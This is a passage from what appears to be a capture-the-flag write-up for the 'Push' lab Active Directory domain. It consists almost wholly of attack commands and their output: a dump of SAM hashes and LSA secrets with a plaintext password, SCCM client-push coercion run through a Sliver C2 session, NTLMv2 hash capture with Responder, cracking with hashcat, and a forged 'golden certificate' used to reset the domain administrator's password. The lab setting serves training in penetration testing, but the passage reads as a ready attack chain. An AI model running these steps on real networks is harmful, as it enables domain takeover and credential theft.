Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#3347d36e92ac0b3c7f9c9fff05083e09: (2023-08-31 18:27:31)
push.vl/Kelly.Hill:$DCC2$10240#Kelly.Hill#b084064849c9a1acba2fd9d4e60d6029: (2025-05-12 03:34:55)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c59b319594744abea7f2db17a2fa65c: (2023-08-31 10:26:08)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
PUSH\MS01$:plain_password_hex:a8588fd11b4f63e1b5a84c2d2cdc4bcae3545f793c7228a77e1ad868edbb9e701ab3e81c4d8c864e58b3d7a01faaeff9facf4536a4129cdae629bdbf445c5a66e6bd6382f3e9184613bdb6031d6c0e04cd123e26ce746c5f0727e81e78ac7d69f2b9b7f5b5d8d8c5c8019e03a7333a5cca60683f3d9c72b0a828bcd04d36a0ba5fd99774d76d609d632641a2047be57041bd3d331872416ba5309f323219cd8d2c608e17153e731a689adfcf7a0163d84477cc1f2d60d63a61b5056a15d2ab00394db19fe60c91380a6495a824b63bf3008de0dbd74b044b5e04a4741f71a1dd224fc60e35c19eb226848814b101c6f6
PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:31fd133d27babb3790e451b6aeea7886:::
[*] DefaultPassword 
PUSH\kelly.hill:ShinraTensei!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x83f7bbd4976dba3418fe397e76d9690c06ee3691
dpapi_userkey:0xe2af091346d181301ff638320e3246e49b9b637c
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Path 2: Privilege Escalation via SCCM NTLM Relay

Discovering the MS01 is a Certificate Authority Server

sliver (http-vulnlabs-4444) > sa-adcs-enum 

[*] Successfully executed sa-adcs-enum (coff-loader)
[*] Got output:

[*] Found 1 CAs in the domain

[*] Listing info for CN=CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=push,DC=vl

  Enterprise CA Name        : CA
  DNS Hostname              : MS01.push.vl
  Flags                     : SUPPORTS_NT_AUTHENTICATION CA_SERVERTYPE_ADVANCED
  Expiration                : 1 years
  CA Cert                   :
    Subject Name            : DC=vl, DC=push, CN=CA
    Thumbprint              : 9dd0081d82796853df4bfb79b3057c5aeaf0b15b
    Serial Number           : 72533888abc96d43a299917a621b857d
    Start Date              : 8/31/2023 07:25:21
    End Date                : 8/31/3022 07:35:21
    Chain                   : DC=vl, DC=push, CN=CA
  <SNIF>

Discovering Microsoft Endpoint Configuration Manager installed on MS01

# echo 'Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName,DisplayVersion,InstallLocation' | base64 -w0 | xclip -sel clip
sliver (http-vulnlabs-4444) > sharpsh -- '-e -c R2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxVbmluc3RhbGxcKiB8IFNlbGVjdCBEaXNwbGF5TmFtZSxEaXNwbGF5VmVyc2lvbixJbnN0YWxsTG9jYXRpb24K'

[*] sharpsh output:

DisplayName                                                    DisplayVersion InstallLocation
-----------                                                    -------------- ---------------
                                                                                             
                                                                                             
Amazon EC2Launch                                               2.0.1521.0                    
Microsoft .NET Host - 7.0.10 (x64)                             56.43.64668                   
aws-cfn-bootstrap                                              2.0.26                        
Configuration Manager Client                                   5.00.9111.1000                
<SNIF>

sliver (http-vulnlabs-4444) > execute-assembly /home/Intrusionz3r0/Documents/Tools/SharpCollection/NetFramework_4.7_x64/SharpSCCM.exe local site-info
[*] Output:

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem 

[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority  
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2286036

Coercing SCCM NTLM Authentication

sliver (http-vulnlabs-4444) > sharpsccm invoke client-push -t 10.8.5.48

[*] sharpsccm output:

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem 

[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: DC01.push.vl
[+] Site code: HQ0
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:

    308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A08205810482057D3082057930820575060B2A864886F70D010C0A0102A08204EE308204EA301C060A2A864886F70D010C0103300E04081E4870643C705F7F020207D0048204C866080A6B3DAD8CDD40432D2C12B2BE58F2FB4F790B1D2312E08F94313ACE7793D01FE8F97235A7FB9197F436C48EFCB0315305B476320718BD46D02C96A1FEBCF084A5B11B08FD32A6DC2E857412CE9B25E3A983D0F7FB3C5D1C801EBBB0CA7B61D4730D4B3EA53F248D18AACD21C1E6A09E1AD8405357E2CA1EBE8DDEFCE6805193F8CCE11D318B88741EAA3C99087894BCE39CFBB0F30AC928D88B112D658284EF9766AA5C0D28E03AC5969C4C276FA767C5C6FE24119CB5436C12E997DD6D1CCCA76FBBC81725E14160DCBD9E12585E79D5871EC774A93A910B7D40E52BFF7B76875AF0EDE16A7E06A2437FBA8B66AF5A2BEE3A2CB3C19B17ECA752885FF4106BD4B20CCAE4FAD8E187BAC16B9D5DBFC70B10ECB41CC6A35282B43BC35846E3A165B3BC78E2DFC6FE3A075334BC2BE0F21C821A25F6B024370345A1B3764AF2A523C3DEAA7897500AC06A65E37FF836456EEA3A45560E319B5250A4639BBB117488FDBCB3F591A4425749ACF27C3018E25E6932BDF353E3CFE5AD4717CB55B1A5FD42FE1AB4070AC33C054085B95F912AB3DA84FA961DFE87EBF2DFAC80050C74E417E7B12D1318B8D99AD13F2650F7D82E611A0B3A690109DBABBF994B32623D4D50DB3F47F4520715317EAA6D67461312D9A9E166C257FE17F1BCB3E633E31B696EB0A5A986BD9DB0397166234414D0CF9F148337DE037E79571E651D29184F335E2DBB6D6E9E7B2632114A8FA7E8D1C30B7522F7F8C9C232C1890D805C6AE22111D6C324716C33352D9D86D2952CAAD59F53846C1C754ECBABD5E6ED60CE14FB5201F9214298FCC0A3D11530F87FD7A4A4E12E350083331BC3CEFB22BAD73A89313F6DC64A3137251F260262DCC9CBF5C91969B322148795014B41859AEF3BE6801CFDEB96C7CB4EE204113A6351A38E957CAD4F2309207B2351C5F4AA0FB9F29538E16979B363E12C1E538F7BECAEE18F7C24BB19DCE0FCF4912E46FBFFC29BAFF58B75178086AF18204C837035732DEA32A0BFEDB94A7A09BEED2F9EABF475C806B39DA04DC89D27AD96E1CCB6E9B095EE1B13B37F64493CF5BA0C64D73C21C1F39ECF59C87AB9FE794456F3D976D4E2A6B20F59C517DB4F84E7262AF6ABF101F620373CD462985CB7362E09A750ED6D8100E169ECA8D99FCBD7F3A327DFCDA818524A061F1B57164E8BA0EB14B9421534E467B11A46D0736A438702FE04BADCA5C9BB03C7D451F7B923343374E850EA4AB248B346D2663A10A2EEB7948D5C78A6D73AB45A3077F354CA67D83F8E9C38752C31A8C34F25E107658C78B36C85F6C5E3C33F59B7DA809A0D8F42BEA014F6DE5B133135EE25A7AB48AC33915076968864D5DCC9D03C387FEE670D24FB729154E8D3B74DD195EFEC1C2037AA5AB5C8480EF15A08644971AD20127AFC7C99BBE76A91999823A0B69E1681061F8983CB4855A6F0D0254331909B7F227D075AA874476D5B3C70FE0BAD536FF7CED381BECBD6D9FBD67AE1BBF23E6163A192A01BF2D682774099F0950F4215CF49F34BA65B915BD6CFA01ED017825147031E3F1C75F47572B98F3FA59EA74B605DFFA7B89E14C04E3E22B9AD751B6D437CF8D49A5476939FC992478120B134377A2D5FDC8519AB28B597F1BD896EB375D02AF18706F6AD9AEC23D1D979CCAD9DC21F50749CB7327207AB86FB13B0B0F503502F677B100F2A09D94F0708C1EF3E20E81C0DEED3B2AD3174301306092A864886F70D0109153106040401000000305D06092B060104018237110131501E4E004D006900630072006F0073006F0066007400200053006F0066007400770061007200650020004B00650079002000530074006F0072006100670065002000500072006F00760069006400650072308203DF06092A864886F70D010706A08203D0308203CC020100308203C506092A864886F70D010701301C060A2A864886F70D010C0103300E040874F81FC3C6A7ED45020207D0808203989B825DA04F323EFF224EF499EE6C592DDD06F60092F58145E9D33EFF20245547CB040CA3095E751D84B9D2888B46119B21D88028F308152B7DE411A43BC81F30D72917E382B4B157B3DE2BC5B5769AA59C734B4FDC21529BA15453DF09DB8766E68FA901DEEC66630CFF7C758BF38DAC145CC6109EEC755B0398EF85405239BDADE93AD11AE6E46F3D77F9AF1DB6B1E546995532BD183F9109BABD9ADF33989D8BCA2B54B54D129D43E71D2D20AD8B73DE204FDEC3B61A1B994A2E7EF335CA63F254D65EB484C59CBD126AA5E675982C786E3D6062F5254EBE8DF33645FBC91238B8E4E73C59044E0C2F273AB99E4C787575981EA753E4031C25BA0FD859D60FA3274F2E3B293536FC3FC0662D6E6BB9B99BDF2BDC3BC512C9E80BC7EBA492284BBC1CF70354E1F64771ECCCEE166AF6B9224D2C2F0B8609967ABEA6E92D017520A7853D3FED66FB96D4F1EFDC47034508FEDEFD6B372C69B971766CB712567A3E7582F230B755D71DA0EC2122EE2C24DB3C52E50C410995A7BA94E76CC6C8635052237DCF4C7718B8E17388DB5B413D03756C86A510E19AAD0FAF16939811E0DF5B98D6C3DD91A259D3142B1258630945F51BA65CCA510205FFD7C282AD927533BA317821D50E1B0D99F9CB68AE198CEE7DAD2D08D8873E4A000320923285DDF2C4D7DF17080927D64549FF0540C03A7892314767C17785D4DAC4968071AC6FB655B590D4496198D5B3664C048480DE91ACCEEF3B0403D7732DE1FAB692148F9D9C7B6616D669DE5339B3DC15061CC76D881D0769420BE75F35FBDB4EB22783A55CBC3FE61E700232B179DBF2EC55120F8D4E52BBE75E9E27C11C1A9963A9D7BCC609E0D62CC12F29A236A7AA590CAB9E5445233803E3323934BA2434179A0C9305A646B2FCB317EA3B22D98FC45DB09D6A211F97D31CCCB7A55F1797D3EBA855EDCC2D3130FBA068C52270D033D70A9C8BF774E2CC198A6667D6E74E7257F21BF64CCEC0F838DE791850ABB75BCA20D3F9BB7B85D8026C8A366AB9A0FAB3F3341B6A5E8B93FBD919F5DEFBB09C3A178ACDEA08A451D1FEED45961382F16A82EE538706FDD9C9C218B253663CEE2C487F276391E2BF838D1E6C454F4226E9B2F99838787F56C690E9D9B4C116E180A3F2A699B1EC54CF1D35B6CA18EFCE751D02998B4036836B6F81278ED0EE692ECA6E03807DA309E572AB24E1299E8A632541B02259DFAD21A8D6CB6101A6C680C59F52DE00EADB329BF09B6801226C4C7A328F45B40C9F0936653F94CC1D8A6D7C01A65B1678A7BB67303B301F300706052B0E03021A04146F8FF3B5C5B15E1F36C51A3D899C34F33E9A9C9A0414FC814D0775146019B99313D7630C216362EA93AE020207D0

[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
      FQDN: 10.8.5.48
      NetBIOS name: 10.8.5.48
      Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:

    GUID:A6D63769-A669-41FD-BAD4-1FBCB0399C01

[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:A6D63769-A669-41FD-BAD4-1FBCB0399C01 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.5.48
[+] Completed execution in 00:00:06.4432509

Retrieving NTLMv2 Hashes

❯ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

[SMB] NTLMv2-SSP Client   : 10.10.170.85
[SMB] NTLMv2-SSP Username : PUSH\sccadmin
[SMB] NTLMv2-SSP Hash     : sccadmin::PUSH:aaaaaaaaaaaaaaaa:5b4978cb8424d7817455c8d75be9caac:0101000000000000006bc5f088c3db0189535b04c9036121000000000100100077006300700045004e004200450054000300100077006300700045004e00420045005400020010006d00490072005a004d0049007a006500040010006d00490072005a004d0049007a00650007000800006bc5f088c3db0106000400020000000800300030000000000000000000000000400000a4466ef19d5811bb4240ed56c011010ce7eda97943f24e4c68de6c803f22f8000a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000
[SMB] NTLMv2-SSP Client   : 10.10.170.85
[SMB] NTLMv2-SSP Username : PUSH\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::PUSH:aaaaaaaaaaaaaaaa:93a4f8afc63fa09c142a924c8ac28a9d:010100000000000080015ef188c3db0179175cc0b27c3f02000000000100100077006300700045004e004200450054000300100077006300700045004e00420045005400020010006d00490072005a004d0049007a006500040010006d00490072005a004d0049007a0065000700080080015ef188c3db0106000400020000000800300030000000000000000000000000400000a4466ef19d5811bb4240ed56c011010ce7eda97943f24e4c68de6c803f22f8000a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000

Cracking sccadmin's NTLMv2 hash

❯ hashcat -m 5600 sccadmin /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

SCCADMIN::PUSH:4a38e3a4e3ca2b52:2dd5c9b84c96005d00225ed382dc85fd:0101000000000000009c113df2c2db01bfaa5559084859260000000002000800300045005900510001001e00570049004e002d0031003000560052004700440049004c004d004200570004003400570049004e002d0031003000560052004700440049004c004d00420057002e0030004500590051002e004c004f00430041004c000300140030004500590051002e004c004f00430041004c000500140030004500590051002e004c004f00430041004c0007000800009c113df2c2db0106000400020000000800300030000000000000000000000000400000b4f4ce1a26e269913204d2ddfc3349df74620108e39a9e05f08f2dbe04a91a2c0a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000:7ujm&UJM

Credentials found: sccadmin:7ujm&UJM

Compromise Domain Controler DC01

Path: 1 Golden Certificate Attack

❯ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'administrator_forged.pfx'

❯ certipy-ad auth -pfx administrator_forged.pfx -username Administrator -domain push.vl -dc-ip 10.10.170.85
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@push.vl
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)

❯ certipy-ad auth -pfx administrator_forged.pfx -username Administrator -domain push.vl -dc-ip 10.10.170.85 -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Connecting to 'ldaps://10.10.170.85:636'
[*] Authenticated to '10.10.170.85' as: u:PUSH\Administrator
Type help for list of commands

# change_password Administrator Password123!
Got User DN: CN=Administrator,CN=Users,DC=push,DC=vl
Attempting to set new password of: Password123!
Password changed successfully!

❯ xfreerdp /v:DC01 /u:Administrator /p:Password123! /dynamic-resolution

Last updated 6 months ago

hashtagMachine information

hashtagCredentials

hashtagInformation Gathering

hashtagService enumeration

hashtagDC01

hashtagDNS

hashtagSMB

hashtagHTTP/S

hashtagMS01

hashtagFTP

hashtagSMB

hashtagHTTP

hashtagDomain

hashtagUser: olivia.wood

hashtagCompromise MS01 Server

hashtagDownload FTP files

hashtagDiscovering excessive permission on folder

hashtagAbusing ClickOnce to gain initial Access

hashtagCreating the malicious dll payload

hashtagCompiling DLL on Linux

hashtagCalculating HASH and Size of DLL to manifest file

hashtagEditing SelfService.dll.manifest

hashtagRecalculating the new edited .manifest file

hashtagEditing SelfService.application

hashtagDiscovering kelly.hill's plaintext credentials

hashtagPath 1: Privilege escalation on MS01 via RBCD (Windows)

hashtagAbusing Resource Base Constrained Delegation

hashtagRequesting TGS using S4U to impersonate Administrator

hashtagDumping SAM database and LSA Secrets

hashtagPath 1: Privilege escalation on MS01 via RBCD (Linux)

hashtagCreating Computer Account

hashtagWriting msds-allowedtoactonbehalfofotheridentity attribute to MS01

hashtagRequesting Ticket TGS to impersonate Administrator

hashtagDumping SAM database and LSA Secrets

hashtagPath 2: Privilege Escalation via SCCM NTLM Relay

hashtagDiscovering the MS01 is a Certificate Authority Server

hashtagDiscovering Microsoft Endpoint Configuration Manager installed on MS01

hashtagCoercing SCCM NTLM Authentication

hashtagRetrieving NTLMv2 Hashes

hashtagCracking sccadmin's NTLMv2 hash

hashtagCompromise Domain Controler DC01

hashtagPath: 1 Golden Certificate Attack

Machine information

Credentials

Information Gathering

Service enumeration

DC01

DNS

SMB

HTTP/S

MS01

FTP

SMB

HTTP

Domain

User: olivia.wood

Compromise MS01 Server

Download FTP files

Discovering excessive permission on folder

Abusing ClickOnce to gain initial Access

Creating the malicious dll payload

Compiling DLL on Linux

Calculating HASH and Size of DLL to manifest file

Editing SelfService.dll.manifest

Recalculating the new edited .manifest file

Editing SelfService.application

Discovering kelly.hill's plaintext credentials

Path 1: Privilege escalation on MS01 via RBCD (Windows)

Abusing Resource Base Constrained Delegation

Requesting TGS using S4U to impersonate Administrator

Dumping SAM database and LSA Secrets

Path 1: Privilege escalation on MS01 via RBCD (Linux)

Creating Computer Account

Writing msds-allowedtoactonbehalfofotheridentity attribute to MS01

Requesting Ticket TGS to impersonate Administrator

Dumping SAM database and LSA Secrets

Path 2: Privilege Escalation via SCCM NTLM Relay

Discovering the MS01 is a Certificate Authority Server

Discovering Microsoft Endpoint Configuration Manager installed on MS01

Coercing SCCM NTLM Authentication

Retrieving NTLMv2 Hashes

Cracking sccadmin's NTLMv2 hash

Compromise Domain Controler DC01

Path: 1 Golden Certificate Attack